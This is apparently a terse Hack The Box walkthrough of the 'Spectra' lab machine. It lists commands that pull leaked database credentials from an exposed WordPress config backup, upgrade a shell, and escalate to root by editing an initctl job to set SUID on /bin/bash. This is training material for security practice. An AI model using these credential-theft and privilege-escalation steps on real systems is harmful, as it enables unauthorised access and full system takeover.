Hack The Box – Spectra
──(root💀kali)-[/home/kali/Downloads]
└─# nmap -A 10.10.10.229
http://spectra.htb/testing/index.php
┌──(root💀kali)-[/home/kali/Downloads]
└─# wget http://spectra.htb/testing/wp-config.php.save
‘DB_USER’, ‘devtest’
‘DB_PASSWORD’, ‘devteam01’
python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
We get the cred
SummerHereWeCome!!
User.txt: e89d27fe195e911XXXXXXXXX
katie@spectra /etc/init $ sudo initctl list | grep test
katie@spectra /etc/init $ sudo /sbin/initctl stop test
katie@spectra /etc/init $ cat test.conf
script
chmod +s /bin/bash
end script
katie@spectra /etc/init $ sudo /sbin/initctl start test
katie@spectra /etc/init $ /bin/bash -p
Root.txt: d44519713b889d5eXXXXXXXXXX